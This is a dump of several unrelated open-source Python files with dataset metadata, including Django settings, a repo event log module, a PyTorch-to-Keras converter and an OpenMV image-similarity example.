c.item.editlog.update(editlog_entry)
c.item.title = title
c.item.update_content(content)
c.item.is_anonymous = form_data['is_anonymous']
#c.item.avatar_id = form_data['avatar_id']
if form_data['avatar_id']:
av = model.Session.query(model.UserAvatar).filter_by(id = form_data['avatar_id']).filter_by(user_id = c.auth_user.id).one()
c.item.avatar = av
else:
c.item.avatar = None
model.Session.commit()
h.redirect_to('/news')
@check_perm('news.manage')
def delete(self):
"""Form handler for deleting news."""
news_q = model.Session.query(model.News)
item = news_q.filter_by(id=c.id).one()
item.is_deleted = True
model.Session.add(item)
model.Session.commit()
h.redirect_to('/news')
@check_perm('news.manage')
def undelete(self):
"""Form handler for restoring deleted news."""
news_q = model.Session.query(model.News)
item = news_q.filter_by(id=c.id).one()
item.is_deleted = False
model.Session.add(item)
model.Session.commit()
h.redirect_to('/news')
| 36.512821 | 135 | 0.593165 |
4a1e69bc25964f24b4d397ecc265e017b6cfec0c | 404 | py | Python | versionSystem/wsgi.py | kasper190/versionSystem | d5f1df4c226e604c1cecb01ef1c2fa2673934c9c | [
"MIT"
] | null | null | null | versionSystem/wsgi.py | kasper190/versionSystem | d5f1df4c226e604c1cecb01ef1c2fa2673934c9c | [
"MIT"
] | null | null | null | versionSystem/wsgi.py | kasper190/versionSystem | d5f1df4c226e604c1cecb01ef1c2fa2673934c9c | [
"MIT"
] | null | null | null | """
WSGI config for versionSystem project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "versionSystem.settings")
application = get_wsgi_application()
| 23.764706 | 78 | 0.792079 |
4a1e6e092db1bc844b45ddf8390e5b4ac89f4867 | 3,271 | py | Python | yhsite/yhsite/settings.py | yuheng19981212/python-Django-mysite-study | ba1c747d84f5ae926f564f890524ca499c9f988b | [
"MIT"
] | null | null | null | yhsite/yhsite/settings.py | yuheng19981212/python-Django-mysite-study | ba1c747d84f5ae926f564f890524ca499c9f988b | [
"MIT"
] | null | null | null | yhsite/yhsite/settings.py | yuheng19981212/python-Django-mysite-study | ba1c747d84f5ae926f564f890524ca499c9f988b | [
"MIT"
] | null | null | null | """
Django settings for yhsite project.
Generated by 'django-admin startproject' using Django 3.0.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6-kkx7zd%_*g)_)j*g6#c#&4%ssugzhzyfwkb$x7gs^n_8@*x4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myblog.apps.MyblogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yhsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yhsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# 这个静态文件目录一定要注意,这个文件一定要注意,只有这样项目才能访问到静态文件
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
| 26.811475 | 91 | 0.697952 |
4a1e6f4b812fd2e84e0875d65fcf8e460f752fa2 | 877 | py | Python | test/functional/create_cache.py | Deimoscoin/deimos | c03a65c72ffe6fadb840bc87e6fd6b4e012def08 | [
"MIT"
] | null | null | null | test/functional/create_cache.py | Deimoscoin/deimos | c03a65c72ffe6fadb840bc87e6fd6b4e012def08 | [
"MIT"
] | null | null | null | test/functional/create_cache.py | Deimoscoin/deimos | c03a65c72ffe6fadb840bc87e6fd6b4e012def08 | [
"MIT"
] | 1 | 2018-06-12T00:50:01.000Z | 2018-06-12T00:50:01.000Z | #!/usr/bin/env python3
# Copyright (c) 2009-2019 The Bitcoin Core developers
# Copyright (c) 2014-2019 The DeimOS Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Create a blockchain cache.
Creating a cache of the blockchain speeds up test execution when running
multiple functional tests. This helper script is executed by test_runner when multiple
tests are being run in parallel.
"""
from test_framework.test_framework import DeimOSTestFramework
class CreateCache(DeimOSTestFramework):
# Test network and test nodes are not required:
def set_test_params(self):
self.num_nodes = 0
self.supports_cli = True
def setup_network(self):
pass
def run_test(self):
pass
if __name__ == '__main__':
CreateCache().main()
| 29.233333 | 86 | 0.743444 |
4a1e7032170e3b0812a444de4232bb975f765aec | 1,110 | py | Python | key_store/tests/test_helpers.py | rimaddo/key-store | 7003c8425ea3139c2ddb47414a0a5be51aa5cde9 | [
"MIT"
] | null | null | null | key_store/tests/test_helpers.py | rimaddo/key-store | 7003c8425ea3139c2ddb47414a0a5be51aa5cde9 | [
"MIT"
] | null | null | null | key_store/tests/test_helpers.py | rimaddo/key-store | 7003c8425ea3139c2ddb47414a0a5be51aa5cde9 | [
"MIT"
] | null | null | null | from collections import namedtuple
from typing import List, Type
import pytest
from key_store.helpers import T, get_keys
from key_store.tests.conftest import EXAMPLE_DICT_1, EXAMPLE_OBJ_1, ExampleObj
class ClassicClass(object):
def __init__(self, name: str, value: int) -> None:
self.name = name
self.value = value
NamedTuple = namedtuple('NamedTuple', 'name, value')
@pytest.mark.parametrize(
"obj, expected_output",
[
(EXAMPLE_OBJ_1, ("name", "date", "value", "repeat_value", "missing_key_value")),
(EXAMPLE_DICT_1, ("name", "date", "value", "repeat_value")),
(ExampleObj, ("name", "date", "value", "repeat_value", "missing_key_value")),
]
)
def test_get_keys__success(obj: Type[T], expected_output: List[str]) -> None:
output = get_keys(obj=obj)
assert output == expected_output
@pytest.mark.parametrize(
"obj",
[
ClassicClass(name="name", value=1),
NamedTuple(name="name", value=1),
]
)
def test_get_keys__failure(obj: Type[T]) -> None:
with pytest.raises(AttributeError):
get_keys(obj=obj)
| 25.813953 | 88 | 0.665766 |
4a1e704650ee69833173030caa929f7affddb82f | 435 | py | Python | utils/gen.py | Ko-oK-OS/Rix | f2949aadfff23a27da9c771282a4c0d8804a1f65 | [
"MIT"
] | 44 | 2021-03-20T02:14:58.000Z | 2022-03-31T03:40:52.000Z | utils/gen.py | Ko-oK-OS/Rix | f2949aadfff23a27da9c771282a4c0d8804a1f65 | [
"MIT"
] | 10 | 2021-05-28T17:00:00.000Z | 2022-02-06T03:14:50.000Z | utils/gen.py | Ko-oK-OS/Rix | f2949aadfff23a27da9c771282a4c0d8804a1f65 | [
"MIT"
] | 4 | 2021-04-28T08:43:35.000Z | 2022-03-18T01:34:28.000Z | import os
import shutil
output_dir = "../bin/"
bin_dir = "../user/target/riscv64gc-unknown-none-elf/debug/"
user_programes = [
"init",
"hello_world",
"sh"
]
for (root, dirs, files) in os.walk(bin_dir):
for f in files:
if f in user_programes:
shutil.copy(src = bin_dir + f, dst = output_dir + f)
print("copy file form" + bin_dir + f + " to " + output_dir + f + "\n")
print("success.")
| 22.894737 | 82 | 0.588506 |
4a1e70d147363004a038345bac41ef92ae04c01c | 1,118 | py | Python | sendsms.py | belelaritra/W-ambulance | ecda7e7789143e4b72b1393a15a035f33cf85474 | [
"MIT"
] | 4 | 2021-09-03T07:30:29.000Z | 2021-12-10T10:54:57.000Z | sendsms.py | belelaritra/W-ambulance | ecda7e7789143e4b72b1393a15a035f33cf85474 | [
"MIT"
] | null | null | null | sendsms.py | belelaritra/W-ambulance | ecda7e7789143e4b72b1393a15a035f33cf85474 | [
"MIT"
] | 5 | 2021-09-03T07:01:30.000Z | 2022-02-24T09:58:30.000Z | # Download the helper library from https://www.twilio.com/docs/python/install
import os
from twilio.rest import Client
# Find your Account SID and Auth Token at twilio.com/console
# and set the environment variables. See http://twil.io/secure
account_sid = "__________YOUR ACCOUNT SID___________"
auth_token = "____________YOUR ACCCOUNT TOKEN______________"
client = Client(account_sid, auth_token)
# ================= Send Message
def sendmessage(to,msg):
message = client.messages.create(
from_='whatsapp:+14155238886',
#body='Hey, I just met you, and this is crazy...',
body=str(msg),
status_callback='http://postb.in/1234abcd',
# to='whatsapp:+918420840551'
to='whatsapp:+91'+str(to)
)
print(message.Status)
# ================= Send Location Type Message
def sendmsglocation(to,msg,latitude,longitude):
message = client.messages \
.create(
from_='whatsapp:+14155238886',
body=str(msg),
persistent_action=['geo:'+str(latitude)+','+str(longitude)],
to='whatsapp:+91'+str(to)
)
print(message.Status)
| 31.942857 | 77 | 0.661896 |
4a1e7193614b6d0b555ffbe65c6655b9140e0332 | 5,810 | py | Python | event_log.py | sambacha/repo | e4d8f5a2f332854acb140b22f1b96fd06c42b66e | [
"Apache-2.0"
] | 1 | 2021-12-11T01:57:58.000Z | 2021-12-11T01:57:58.000Z | event_log.py | sambacha/repo | e4d8f5a2f332854acb140b22f1b96fd06c42b66e | [
"Apache-2.0"
] | null | null | null | event_log.py | sambacha/repo | e4d8f5a2f332854acb140b22f1b96fd06c42b66e | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
#
# Copyright (C) 2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import multiprocessing
TASK_COMMAND = "command"
TASK_SYNC_NETWORK = "sync-network"
TASK_SYNC_LOCAL = "sync-local"
class EventLog(object):
"""Event log that records events that occurred during a repo invocation.
Events are written to the log as a consecutive JSON entries, one per line.
Each entry contains the following keys:
- id: A ('RepoOp', ID) tuple, suitable for storing in a datastore.
The ID is only unique for the invocation of the repo command.
- name: Name of the object being operated upon.
- task_name: The task that was performed.
- start: Timestamp of when the operation started.
- finish: Timestamp of when the operation finished.
- success: Boolean indicating if the operation was successful.
- try_count: A counter indicating the try count of this task.
Optionally:
- parent: A ('RepoOp', ID) tuple indicating the parent event for nested
events.
Valid task_names include:
- command: The invocation of a subcommand.
- sync-network: The network component of a sync command.
- sync-local: The local component of a sync command.
Specific tasks may include additional informational properties.
"""
def __init__(self):
"""Initializes the event log."""
self._log = []
self._parent = None
def Add(
self,
name,
task_name,
start,
finish=None,
success=None,
try_count=1,
kind="RepoOp",
):
"""Add an event to the log.
Args:
name: Name of the object being operated upon.
task_name: A sub-task that was performed for name.
start: Timestamp of when the operation started.
finish: Timestamp of when the operation finished.
success: Boolean indicating if the operation was successful.
try_count: A counter indicating the try count of this task.
kind: The kind of the object for the unique identifier.
Returns:
A dictionary of the event added to the log.
"""
event = {
"id": (kind, _NextEventId()),
"name": name,
"task_name": task_name,
"start_time": start,
"try": try_count,
}
if self._parent:
event["parent"] = self._parent["id"]
if success is not None or finish is not None:
self.FinishEvent(event, finish, success)
self._log.append(event)
return event
def AddSync(self, project, task_name, start, finish, success):
"""Add a event to the log for a sync command.
Args:
project: Project being synced.
task_name: A sub-task that was performed for name.
One of (TASK_SYNC_NETWORK, TASK_SYNC_LOCAL)
start: Timestamp of when the operation started.
finish: Timestamp of when the operation finished.
success: Boolean indicating if the operation was successful.
Returns:
A dictionary of the event added to the log.
"""
event = self.Add(project.relpath, task_name, start, finish, success)
if event is not None:
event["project"] = project.name
if project.revisionExpr:
event["revision"] = project.revisionExpr
if project.remote.url:
event["project_url"] = project.remote.url
if project.remote.fetchUrl:
event["remote_url"] = project.remote.fetchUrl
try:
event["git_hash"] = project.GetCommitRevisionId()
except Exception:
pass
return event
def GetStatusString(self, success):
"""Converst a boolean success to a status string.
Args:
success: Boolean indicating if the operation was successful.
Returns:
status string.
"""
return "pass" if success else "fail"
def FinishEvent(self, event, finish, success):
"""Finishes an incomplete event.
Args:
event: An event that has been added to the log.
finish: Timestamp of when the operation finished.
success: Boolean indicating if the operation was successful.
Returns:
A dictionary of the event added to the log.
"""
event["status"] = self.GetStatusString(success)
event["finish_time"] = finish
return event
def SetParent(self, event):
"""Set a parent event for all new entities.
Args:
event: The event to use as a parent.
"""
self._parent = event
def Write(self, filename):
"""Writes the log out to a file.
Args:
filename: The file to write the log to.
"""
with open(filename, "w+") as f:
for e in self._log:
json.dump(e, f, sort_keys=True)
f.write("\n")
# An integer id that is unique across this invocation of the program.
_EVENT_ID = multiprocessing.Value("i", 1)
def _NextEventId():
"""Helper function for grabbing the next unique id.
Returns:
A unique, to this invocation of the program, integer id.
"""
with _EVENT_ID.get_lock():
val = _EVENT_ID.value
_EVENT_ID.value += 1
return val
| 30.904255 | 76 | 0.641997 |
4a1e731233b26454551744b1ec12e32b8e19cd47 | 2,671 | py | Python | pytorch_keras_converter/utility/t2k_equivalents/container.py | sonibla/pytorch_keras_converter | 21925b67b6eb3cbbfa8eb6d33f682d57dafd357d | [
"MIT"
] | 17 | 2019-10-01T14:14:18.000Z | 2021-04-25T13:32:24.000Z | pytorch_keras_converter/utility/t2k_equivalents/container.py | sonibla/pytorch_keras_converter | 21925b67b6eb3cbbfa8eb6d33f682d57dafd357d | [
"MIT"
] | null | null | null | pytorch_keras_converter/utility/t2k_equivalents/container.py | sonibla/pytorch_keras_converter | 21925b67b6eb3cbbfa8eb6d33f682d57dafd357d | [
"MIT"
] | 2 | 2019-10-01T14:02:43.000Z | 2019-10-01T14:14:19.000Z | try:
import tensorflow.keras as keras
except ImportError:
try:
import keras
except ImportError:
keras = None
def Sequential(model, file=False):
"""
Converts a torch.nn.Sequential layer
Arguments:
-model:
A LayerRepresentation object of the layer Sequential to convert
-file (bool):
If we want to write the equivalent in a python file
Raises:
-ImportError:
If Keras import failed
Returns:
Keras equivalent.
If file is True, returns as a str to put in a python file
Else, return the keras layer
If layers don't have equivaents yet, returns None
"""
if keras is None:
raise ImportError("Could not import keras. Conversion failed !")
name = model.completeName()
if not file:
kerasLayer = keras.Sequential(name=name)
lNumber = -1
# First, we need to sort layers
subLayersDict = dict()
for child in model.children:
if 'keras' not in child.equivalent.keys():
return None
try:
# If layers aren't named,
# PyTorch uses default named '0', '1', '2',...
lNumber = int(child.name)
except ValueError:
lNumber += 1
subLayersDict[lNumber] = child.equivalent['keras']
subLayersList = [None]*subLayersDict.__len__()
for number, subLayer in subLayersDict.items():
subLayersList[number] = subLayer
if None in subLayersList:
return None
for subLayer in subLayersList:
kerasLayer.add(subLayer)
return kerasLayer
else:
lNumber = -1
# First, we need to sort layers
subLayersDict = dict()
for child in model.children:
if 'keras' not in child.equivalentTxt.keys():
return None
try:
# If layers aren't named,
# PyTorch uses default named '0', '1', '2',...
lNumber = int(child.name)
except ValueError:
lNumber += 1
subLayersDict[lNumber] = child.equivalentTxt['keras']
subLayersList = [None]*subLayersDict.__len__()
for number, subLayerTxt in subLayersDict.items():
subLayersList[number] = subLayerTxt
if None in subLayersList:
return None
outstr = 'keras.Sequential(['
for subLayerTxt in subLayersList:
outstr = outstr + '\n ' + subLayerTxt + ','
outstr = outstr[:-1] + '\n], name=' + name + ')'
return outstr
| 27.822917 | 75 | 0.557844 |
4a1e737062c9cce9a9f96e4cae44dd0c4aacd107 | 1,369 | py | Python | scripts/examples/OpenMV/20-Frame-Differencing/on_disk_structural_similarity.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 1,761 | 2015-07-10T23:14:17.000Z | 2022-03-30T07:49:49.000Z | scripts/examples/OpenMV/20-Frame-Differencing/on_disk_structural_similarity.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 487 | 2015-07-07T23:21:20.000Z | 2022-03-30T17:13:22.000Z | scripts/examples/OpenMV/20-Frame-Differencing/on_disk_structural_similarity.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 882 | 2015-08-01T08:34:19.000Z | 2022-03-30T07:36:23.000Z | # Structural Similarity (SSIM) Example
#
# Note: You will need an SD card to run this example.
#
# This example shows off how to use the SSIM algorithm on your OpenMV Cam
# to detect differences between two images. The SSIM algorithm compares
# 8x8 blocks of pixels between two images to determine a similarity
# score between two images.
import sensor, image, pyb, os, time
# The image has likely changed if the sim.min() is lower than this.
MIN_TRIGGER_THRESHOLD = -0.4
sensor.reset() # Initialize the camera sensor.
sensor.set_pixformat(sensor.RGB565) # or sensor.GRAYSCALE
sensor.set_framesize(sensor.QVGA) # or sensor.QQVGA (or others)
sensor.skip_frames(time = 2000) # Let new settings take affect.
sensor.set_auto_whitebal(False) # Turn off white balance.
clock = time.clock() # Tracks FPS.
if not "temp" in os.listdir(): os.mkdir("temp") # Make a temp directory
print("About to save background image...")
sensor.skip_frames(time = 2000) # Give the user time to get ready.
sensor.snapshot().save("temp/bg.bmp")
print("Saved background image!")
while(True):
clock.tick() # Track elapsed milliseconds between snapshots().
img = sensor.snapshot() # Take a picture and return the image.
sim = img.get_similarity("temp/bg.bmp")
change = "- Change -" if sim.min() < MIN_TRIGGER_THRESHOLD else "- No Change -"
print(clock.fps(), change, sim)
| 38.027778 | 83 | 0.734112 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.